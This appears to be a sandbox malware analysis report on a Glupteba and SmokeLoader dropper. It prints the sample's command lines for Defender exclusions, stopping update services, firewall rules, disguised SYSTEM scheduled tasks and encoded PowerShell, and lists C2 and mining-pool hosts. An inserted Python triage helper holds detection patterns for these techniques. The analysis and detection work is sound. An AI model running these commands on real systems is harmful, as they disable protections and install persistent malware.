Analysis Overview
SHA256
fae531687cc458d8d7e504b81776514eec3cd9700891a1b873afa3748c84cc78
Threat Level: Known bad
The file allnewumm.exe was found to be: Known bad.
Malicious Activity Summary
Glupteba payload
Suspicious use of NtCreateUserProcessOtherParentProcess
Glupteba
PrivateLoader
UAC bypass
SmokeLoader
Windows security bypass
Detected executables Discord URL observed in first stage droppers
Identifies VirtualBox via ACPI registry values (likely anti-VM)
Downloads MZ/PE file
Modifies Windows Firewall
Stops running service(s)
Checks computer location settings
Checks BIOS information in registry
Drops startup file
Reads user/profile data of web browsers
Loads dropped DLL
Themida packer
Executes dropped EXE
UPX packed file
Windows security modification
Checks whether UAC is enabled
Legitimate hosting services abused for malware hosting/C2
Enumerates connected drives
Looks up external IP address via web service
Drops file in System32 directory
Suspicious use of NtSetInformationThreadHideFromDebugger
Suspicious use of SetThreadContext
Launches sc.exe
Enumerates physical storage devices
Unsigned PE
Program crash
Suspicious behavior: MapViewOfSection
Checks SCSI registry key(s)
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Delays execution with timeout.exe
Creates scheduled task(s)
Enumerates system info in registry
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-21 22:51
Signatures
Unsigned PE
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-21 22:51
Reported
2023-11-21 22:54
Platform
win7-20231020-en
Max time kernel
8s
Max time network
149s
Command Line
Signatures
Glupteba
Glupteba payload
SmokeLoader
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
Detected executables Discord URL observed in first stage droppers
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\latestX.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
UPX packed file
Windows security modification
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" | C:\Users\Admin\AppData\Local\Temp\Random.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2856 set thread context of 1716 | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\allnewumm.exe
"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Users\Admin\AppData\Local\Temp\Random.exe
"C:\Users\Admin\AppData\Local\Temp\Random.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231121225237.log C:\Windows\Logs\CBS\CbsPersist_20231121225237.cab
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe
"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"
C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe
"C:\Users\Admin\Pictures\y21BWXLSetSymUVPYoQhMk6V.exe"
C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe
"C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe" --silent --allusers=0
C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe
"C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe"
C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe
"C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe"
C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe
"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"
C:\Users\Admin\AppData\Local\Temp\7zSA60F.tmp\Install.exe
.\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSAA53.tmp\Install.exe
.\Install.exe /IuCdidQXCBm "385118" /S
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gXngEgmba" /SC once /ST 07:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gXngEgmba"
C:\Windows\system32\taskeng.exe
taskeng.exe {5F464B45-1C3E-4674-89FA-E7D49161E213} S-1-5-21-1154728922-3261336865-3456416385-1000:TLIDUQCQ\Admin:Interactive:[1]
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe
"C:\Users\Admin\Pictures\ILfOFWfAGxFuXVJ2FTV1JfDh.exe"
C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\system32\taskeng.exe
taskeng.exe {148EF647-0594-4E96-9E7E-28F5180B30FC} S-1-5-18:NT AUTHORITY\System:Service:
C:\Windows\System32\schtasks.exe
C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\DBFHDHJKKJ.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\SysWOW64\timeout.exe
timeout /t 5
C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gXngEgmba"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
C:\Windows\System32\sc.exe
sc stop UsoSvc
C:\Windows\System32\sc.exe
sc stop WaaSMedicSvc
C:\Windows\System32\sc.exe
sc stop wuauserv
C:\Windows\System32\sc.exe
sc stop bits
C:\Windows\System32\sc.exe
sc stop dosvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
C:\Windows\System32\cmd.exe
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-ac 0
C:\Windows\System32\powercfg.exe
powercfg /x -standby-timeout-dc 0
C:\Windows\system32\schtasks.exe
"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"
C:\Windows\System32\conhost.exe
C:\Windows\System32\conhost.exe
C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe
"C:\Users\Admin\Pictures\GOW6ZNpnNph28izNSxaj42Zj.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c start "" "C:\ProgramData\FHCGCAAKJD.exe"
C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "bSTfouYtWkypYZNMeg" /SC once /ST 22:55:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe\" rd /ctsite_idMSp 385118 /S" /V1 /F
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe" & del "C:\ProgramData\*.dll"" & exit
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\explorer.exe
C:\Windows\explorer.exe
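Triage helper, added here as an example; it is not part of the sandbox report and not code from any of the samples above. It runs a handful of pattern rules over command lines copied from the process list (a constructed subset, not a full export of the tree), decodes the -EncodedCommand payload of the gXngEgmba task (PowerShell encodes it as base64 over UTF-16LE), and counts which services the chain stops. The rule names and the SAMPLE_COMMAND_LINES list are the example's own.

```python
import base64
import re
from collections import Counter

# Command lines copied from the process list above. This is a constructed
# subset for the example, not a full export of the process tree.
SAMPLE_COMMAND_LINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force',
    r'"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"',
    r'REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64',
    r'schtasks /CREATE /TN "gXngEgmba" /SC once /ST 07:13:01 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="',
    r'C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc',
    r'''"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"''',
    r'netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes',
    r'C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -standby-timeout-ac 0',
]

# PowerShell accepts -EncodedCommand and its abbreviations down to -e; the
# payload is base64 over UTF-16LE text, never UTF-8.
ENCODED_RE = re.compile(r"-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)

# Example rule set (names are this example's own, not sandbox signature names).
RULES = {
    "defender-exclusion": re.compile(
        r"Add-MpPreference\s+-ExclusionPath|Windows Defender\\Exclusions", re.I),
    "defender-telemetry-off": re.compile(r"SpyNetReporting.*?/d\s+0\b", re.I),
    "service-stop": re.compile(r"\bsc\s+stop\s+(\w+)", re.I),
    "firewall-allow": re.compile(
        r"netsh\s+advfirewall\s+firewall\s+add\s+rule.*action=allow", re.I),
    "lolbin-proxy": re.compile(r'forfiles(?:\.exe)?"?\s+/p\b.*?\s/c\s', re.I),
    "scheduled-task": re.compile(r'schtasks(?:\.exe)?"?\s+/create', re.I),
    "encoded-powershell": ENCODED_RE,
    "power-settings": re.compile(
        r"powercfg\s+/x\s+-(?:standby|hibernate)-timeout", re.I),
}


def decode_encoded_command(b64: str) -> str:
    """Decode a PowerShell -EncodedCommand argument back to script text."""
    raw = base64.b64decode(b64, validate=True)
    return raw.decode("utf-16-le")


def classify(cmdline: str) -> dict:
    """Return {tag: detail} for every rule that fires on one command line."""
    hits = {}
    for tag, rx in RULES.items():
        m = rx.search(cmdline)
        if not m:
            continue
        if tag == "service-stop":
            hits[tag] = rx.findall(cmdline)  # every service in an '&' chain
        elif tag == "encoded-powershell":
            try:
                hits[tag] = decode_encoded_command(m.group(1))
            except (ValueError, UnicodeDecodeError):
                hits[tag] = "<undecodable: " + m.group(1)[:24] + "...>"
        else:
            hits[tag] = m.group(0)
    return hits


def triage(cmdlines):
    """Apply the rules to a list of command lines.

    Returns (findings, stopped): findings is a list of (cmdline, hits) for
    lines that fired at least one rule; stopped counts how often each
    service was targeted with 'sc stop' across the whole set.
    """
    findings = []
    stopped = Counter()
    for line in cmdlines:
        hits = classify(line)
        if hits:
            findings.append((line, hits))
            for svc in hits.get("service-stop", []):
                stopped[svc.lower()] += 1
    return findings, stopped


if __name__ == "__main__":
    findings, stopped = triage(SAMPLE_COMMAND_LINES)
    for line, hits in findings:
        print(line[:80])
        for tag, detail in hits.items():
            print("   ", tag, "->", detail)
    print("services stopped:", dict(stopped))
```

The decoded task body is start-process -WindowStyle Hidden gpupdate.exe /force, which matches the gpupdate.exe /force process that follows the task run in the list above. When hunting the Defender exclusions on a live host, query both registry views: the key the sandbox logged for Random.exe sits under Wow6432Node, so it was written by a 32-bit process through WOW64 registry redirection, and the reg.exe chain above deliberately writes both views with /reg:32 and /reg:64.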
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 8.8.8.8:53 | yip.su | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| US | 188.114.96.0:443 | yip.su | tcp |
| US | 8.8.8.8:53 | gobo23cl.top | udp |
| US | 8.8.8.8:53 | julimichkids.online | udp |
| US | 8.8.8.8:53 | flyawayaero.net | udp |
| US | 8.8.8.8:53 | gobo24cl.top | udp |
| MY | 111.90.146.230:80 | | tcp |
| US | 8.8.8.8:53 | redirector.pm | udp |
| US | 8.8.8.8:53 | lycheepanel.info | udp |
| US | 8.8.8.8:53 | rawcracker.com | udp |
| US | 8.8.8.8:53 | net.geo.opera.com | udp |
| US | 194.49.94.67:80 | | tcp |
| DE | 88.198.22.18:443 | julimichkids.online | tcp |
| US | 172.67.215.14:80 | gobo23cl.top | tcp |
| US | 104.21.93.225:443 | flyawayaero.net | tcp |
| US | 188.114.97.0:80 | rawcracker.com | tcp |
| US | 188.114.97.0:443 | rawcracker.com | tcp |
| US | 194.49.94.85:443 | redirector.pm | tcp |
| US | 104.21.32.208:443 | lycheepanel.info | tcp |
| NL | 185.26.182.112:80 | net.geo.opera.com | tcp |
| NL | 185.26.182.112:443 | net.geo.opera.com | tcp |
| US | 172.67.215.14:443 | gobo23cl.top | tcp |
| US | 188.114.97.0:443 | rawcracker.com | tcp |
| US | 8.8.8.8:53 | apps.identrust.com | udp |
| US | 8.8.8.8:53 | bobkelsofan.com | udp |
| US | 8.8.8.8:53 | potatogoose.com | udp |
| US | 172.67.169.68:443 | bobkelsofan.com | tcp |
| NL | 88.221.25.153:80 | apps.identrust.com | tcp |
| US | 104.21.35.235:443 | potatogoose.com | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| US | 8.8.8.8:53 | host-file-host6.com | udp |
| US | 8.8.8.8:53 | host-host-file8.com | udp |
| US | 95.214.26.28:80 | host-host-file8.com | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| US | 8.8.8.8:53 | t.me | udp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 8.8.8.8:53 | steamcommunity.com | udp |
| NL | 23.222.49.98:443 | steamcommunity.com | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| DE | 49.13.94.153:443 | | tcp |
| US | 8.8.8.8:53 | xmr-eu1.nanopool.org | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.67.143:443 | pastebin.com | tcp |
| FR | 51.15.193.130:14433 | xmr-eu1.nanopool.org | tcp |
Files
memory/2508-0-0x0000000074730000-0x0000000074E1E000-memory.dmp
memory/2508-1-0x0000000000C60000-0x0000000001B40000-memory.dmp
\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
| SHA512 | c7d8be36705e08fcd8a7ed8a319aac2aa1d26397081a75511408d51871daa05e21c89be7428eda8a5f7f757ba0c0e74e710e8515b26c89c19b8d7f480a1c0a0b |
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
| MD5 | cba9c1d1fcbf999d9ccb04050c5c5154 |
| SHA1 | 554e436c9c3f1f16c9a9b7ab74dd4cd191118481 |
| SHA256 | c3ab7948969593528e883956dc2cb0a754a4832076bc2e9b6c4f1c7ce2002842 |
